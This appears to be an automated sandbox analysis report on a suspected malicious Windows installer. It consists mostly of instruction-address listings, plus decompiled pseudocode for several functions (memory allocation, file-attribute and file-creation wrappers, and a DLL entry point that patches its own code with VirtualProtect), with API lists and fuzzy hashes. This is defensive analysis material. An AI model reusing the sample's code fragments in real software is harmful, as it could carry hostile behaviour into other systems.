                                                                                                                          0x00406117
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x0040611c
                                                                                                                          0x0040611f
                                                                                                                          0x0040611f
                                                                                                                          0x0040611f
                                                                                                                          0x00406125
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406127
                                                                                                                          0x0040612a
                                                                                                                          0x0040612d
                                                                                                                          0x00406130
                                                                                                                          0x00406133
                                                                                                                          0x00406136
                                                                                                                          0x00406139
                                                                                                                          0x0040613c
                                                                                                                          0x0040613f
                                                                                                                          0x00406142
                                                                                                                          0x00406145
                                                                                                                          0x0040615d
                                                                                                                          0x00406160
                                                                                                                          0x00406163
                                                                                                                          0x00406166
                                                                                                                          0x00406166
                                                                                                                          0x00406169
                                                                                                                          0x0040616d
                                                                                                                          0x0040616f
                                                                                                                          0x00406147
                                                                                                                          0x00406147
                                                                                                                          0x0040614f
                                                                                                                          0x00406154
                                                                                                                          0x00406156
                                                                                                                          0x00406158
                                                                                                                          0x00406158
                                                                                                                          0x00406172
                                                                                                                          0x00406179
                                                                                                                          0x0040617c
                                                                                                                          0x00000000
                                                                                                                          0x0040617e
                                                                                                                          0x00000000
                                                                                                                          0x0040617e
                                                                                                                          0x0040617c
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061be
                                                                                                                          0x004061be
                                                                                                                          0x004061c2
                                                                                                                          0x004067ca
                                                                                                                          0x00000000
                                                                                                                          0x004067ca
                                                                                                                          0x004061c8
                                                                                                                          0x004061cb
                                                                                                                          0x004061ce
                                                                                                                          0x004061d2
                                                                                                                          0x004061d5
                                                                                                                          0x004061db
                                                                                                                          0x004061dd
                                                                                                                          0x004061dd
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x004061e3
                                                                                                                          0x004061e3
                                                                                                                          0x004061e9
                                                                                                                          0x00406187
                                                                                                                          0x00406187
                                                                                                                          0x0040618a
                                                                                                                          0x00000000
                                                                                                                          0x0040618a
                                                                                                                          0x004061eb
                                                                                                                          0x004061eb
                                                                                                                          0x004061ee
                                                                                                                          0x004061f1
                                                                                                                          0x004061f4
                                                                                                                          0x004061f7
                                                                                                                          0x004061fa
                                                                                                                          0x004061fd
                                                                                                                          0x00406200
                                                                                                                          0x00406203
                                                                                                                          0x00406206
                                                                                                                          0x00406209
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406227
                                                                                                                          0x0040622a
                                                                                                                          0x0040622a
                                                                                                                          0x0040622d
                                                                                                                          0x00406231
                                                                                                                          0x00406233
                                                                                                                          0x0040620b
                                                                                                                          0x0040620b
                                                                                                                          0x00406213
                                                                                                                          0x00406218
                                                                                                                          0x0040621a
                                                                                                                          0x0040621c
                                                                                                                          0x0040621c
                                                                                                                          0x00406236
                                                                                                                          0x0040623d
                                                                                                                          0x00406240
                                                                                                                          0x00000000
                                                                                                                          0x00406242
                                                                                                                          0x00000000
                                                                                                                          0x00406242
                                                                                                                          0x00000000
                                                                                                                          0x004064cf
                                                                                                                          0x004064cf
                                                                                                                          0x004064d3
                                                                                                                          0x004067fa
                                                                                                                          0x00000000
                                                                                                                          0x004067fa
                                                                                                                          0x004064d9
                                                                                                                          0x004064dc
                                                                                                                          0x004064df
                                                                                                                          0x004064e3
                                                                                                                          0x004064e6
                                                                                                                          0x004064ec
                                                                                                                          0x004064ee
                                                                                                                          0x004064ee
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629f
                                                                                                                          0x0040629f
                                                                                                                          0x004062a2
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x004065de
                                                                                                                          0x004065e2
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x00406611
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x004065e4
                                                                                                                          0x004065e7
                                                                                                                          0x004065eb
                                                                                                                          0x004065ee
                                                                                                                          0x004065ee
                                                                                                                          0x004065f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040669b
                                                                                                                          0x0040669f
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066c4
                                                                                                                          0x004066cb
                                                                                                                          0x004066d2
                                                                                                                          0x004066d2
                                                                                                                          0x00000000
                                                                                                                          0x004066d2
                                                                                                                          0x004066a1
                                                                                                                          0x004066a4
                                                                                                                          0x004066a7
                                                                                                                          0x004066aa
                                                                                                                          0x004066b1
                                                                                                                          0x004065f5
                                                                                                                          0x004065f5
                                                                                                                          0x004065f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040678c
                                                                                                                          0x0040678f
                                                                                                                          0x00406690
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063c6
                                                                                                                          0x004063c8
                                                                                                                          0x004063cf
                                                                                                                          0x004063d0
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e5
                                                                                                                          0x004063e7
                                                                                                                          0x004063e7
                                                                                                                          0x004063e8
                                                                                                                          0x004063eb
                                                                                                                          0x004063f2
                                                                                                                          0x004063f5
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066e8
                                                                                                                          0x004066e8
                                                                                                                          0x004066ec
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00406824
                                                                                                                          0x004066f2
                                                                                                                          0x004066f5
                                                                                                                          0x004066f8
                                                                                                                          0x004066fc
                                                                                                                          0x004066ff
                                                                                                                          0x00406705
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x0040670a
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x00406710
                                                                                                                          0x00406710
                                                                                                                          0x00406714
                                                                                                                          0x00406774
                                                                                                                          0x00406777
                                                                                                                          0x0040677c
                                                                                                                          0x0040677d
                                                                                                                          0x0040677f
                                                                                                                          0x00406781
                                                                                                                          0x00406784
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00000000
                                                                                                                          0x00406696
                                                                                                                          0x00406690
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x00406351
                                                                                                                          0x00406353
                                                                                                                          0x00406353
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406690
                                                                                                                          0x00406617
                                                                                                                          0x00406614

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                                                          • Instruction ID: f7c6f07f586ed293a1c67bf574783cb577a0acbc2814a7f5ecfd539a56c9ebac
                                                                                                                          • Opcode Fuzzy Hash: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                                                          • Instruction Fuzzy Hash: AF715671D00229CBDF28CF98C844BADBBB1FF44305F15816AD816BB281C7785A46DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401B06, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00401B06(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x1c));
				_t30 =  *0x40af50; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E004059FF(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x24)));
						_t11 =  *0x40af50; // 0x0
						 *_t34 = _t11;
						 *0x40af50 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E004059DD(_t33, _t2);
							_push(_t30);
							 *0x40af50 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								E004059DD(0x409b50, _t30 + 4);
								_t21 =  *0x40af50; // 0x0
								E004059DD(_t32, _t21 + 4);
								_t24 =  *0x40af50; // 0x0
								_push(0x409b50);
								_push(_t24 + 4);
								E004059DD();
								L15:
								 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004059FF(_t27, _t30, _t33, _t27, 0xffffffe8));
					E0040529E();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}













                                                                                                                          0x00401b06
                                                                                                                          0x00401b06
                                                                                                                          0x00401b09
                                                                                                                          0x00401b11
                                                                                                                          0x00401b59
                                                                                                                          0x00401b87
                                                                                                                          0x00401b90
                                                                                                                          0x00401b92
                                                                                                                          0x00401b96
                                                                                                                          0x00401b9b
                                                                                                                          0x00401ba0
                                                                                                                          0x00401ba2
                                                                                                                          0x00401b5b
                                                                                                                          0x00401b5d
                                                                                                                          0x0040265c
                                                                                                                          0x00401b63
                                                                                                                          0x00401b63
                                                                                                                          0x00401b68
                                                                                                                          0x00401b6f
                                                                                                                          0x00401b70
                                                                                                                          0x00401b75
                                                                                                                          0x00401b75
                                                                                                                          0x00401b5d
                                                                                                                          0x00000000
                                                                                                                          0x00401b13
                                                                                                                          0x00401b13
                                                                                                                          0x00401b13
                                                                                                                          0x00401b16
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00401b1c
                                                                                                                          0x00401b20
                                                                                                                          0x00000000
                                                                                                                          0x00401b22
                                                                                                                          0x00401b24
                                                                                                                          0x00000000
                                                                                                                          0x00401b2a
                                                                                                                          0x00401b2a
                                                                                                                          0x00401b34
                                                                                                                          0x00401b39
                                                                                                                          0x00401b43
                                                                                                                          0x00401b48
                                                                                                                          0x00401b4d
                                                                                                                          0x00401b51
                                                                                                                          0x004027b1
                                                                                                                          0x0040288b
                                                                                                                          0x0040288e
                                                                                                                          0x00402894
                                                                                                                          0x00402894
                                                                                                                          0x00401b24
                                                                                                                          0x00000000
                                                                                                                          0x00401b20
                                                                                                                          0x004021fb
                                                                                                                          0x00402208
                                                                                                                          0x00402209
                                                                                                                          0x0040220e
                                                                                                                          0x0040220e
                                                                                                                          0x00402896
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32 ref: 00401B75
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B87
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree
                                                                                                                          • String ID: Call
                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                          • Opcode ID: 2dc775666dca31206916f57334fb0a9f74be6216eb206d4775a60ee4480347cc
                                                                                                                          • Instruction ID: dedcc356a049729cc32aa0533657a7b943fc31f5ec42b7739970f76d43a2a4df
                                                                                                                          • Opcode Fuzzy Hash: 2dc775666dca31206916f57334fb0a9f74be6216eb206d4775a60ee4480347cc
                                                                                                                          • Instruction Fuzzy Hash: D221A8B2604202DBD710FBA4DE8595F73A4FB44328724453BF606F32D0EB78A8119B6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10002930, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004054 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}



                                                                                                                          0x10002939
                                                                                                                          0x1000293e
                                                                                                                          0x1000294e
                                                                                                                          0x10002956
                                                                                                                          0x1000295d
                                                                                                                          0x10002962
                                                                                                                          0x10002967
                                                                                                                          0x1000296c
                                                                                                                          0x10002971
                                                                                                                          0x10002976
                                                                                                                          0x10002976
                                                                                                                          0x1000297e

                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 1000294E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID: `gxt
                                                                                                                          • API String ID: 544645111-3883184993
                                                                                                                          • Opcode ID: 34d967791fa0c81937acb5e832d60935bd6fac481f559dacb71f15d92aed8369
                                                                                                                          • Instruction ID: 48d6293a520ab1310b80528f385a012c899c9e0ceb66e9e696cbd892b99779f9
                                                                                                                          • Opcode Fuzzy Hash: 34d967791fa0c81937acb5e832d60935bd6fac481f559dacb71f15d92aed8369
                                                                                                                          • Instruction Fuzzy Hash: 1BE0AEF15092A0DEF360DF688CC47023EE4A3983C5B03842AE348F6269EB3841448B19
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1000120C, Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNELBASE(00000000), ref: 100012CB
                                                                                                                          • GetLastError.KERNEL32 ref: 100013D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorFileLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1214770103-0
                                                                                                                          • Opcode ID: e37e7e391b3a2b8b5636dc6aebf24869d58b81a53228d5294debfeeb9962e7db
                                                                                                                          • Instruction ID: f07c43787ce958523a2b1e991860d2c35ff6be18a2ffa2491c02e46e3495c162
                                                                                                                          • Opcode Fuzzy Hash: e37e7e391b3a2b8b5636dc6aebf24869d58b81a53228d5294debfeeb9962e7db
                                                                                                                          • Instruction Fuzzy Hash: B75183FA904214DFFB20DFA4DC8279977A4EB443D4F21842AFA04E721DDB34A990CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004056B4, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E004056B4(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                          0x004056b8
                                                                                                                          0x004056c5
                                                                                                                          0x004056da
                                                                                                                          0x004056e0

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,80000000,00000003), ref: 004056B8
                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                          • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                                                          • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                          • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405695, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405695(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                                                          0x00405699
                                                                                                                          0x004056a2
                                                                                                                          0x00000000
                                                                                                                          0x004056ab
                                                                                                                          0x004056b1

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(?,004054A0,?,?,?), ref: 00405699
                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 004056AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                          • Instruction ID: 6114cdacef20a61ffb1e354697c2a54f95ff97830a0005cd613603337fba2c3c
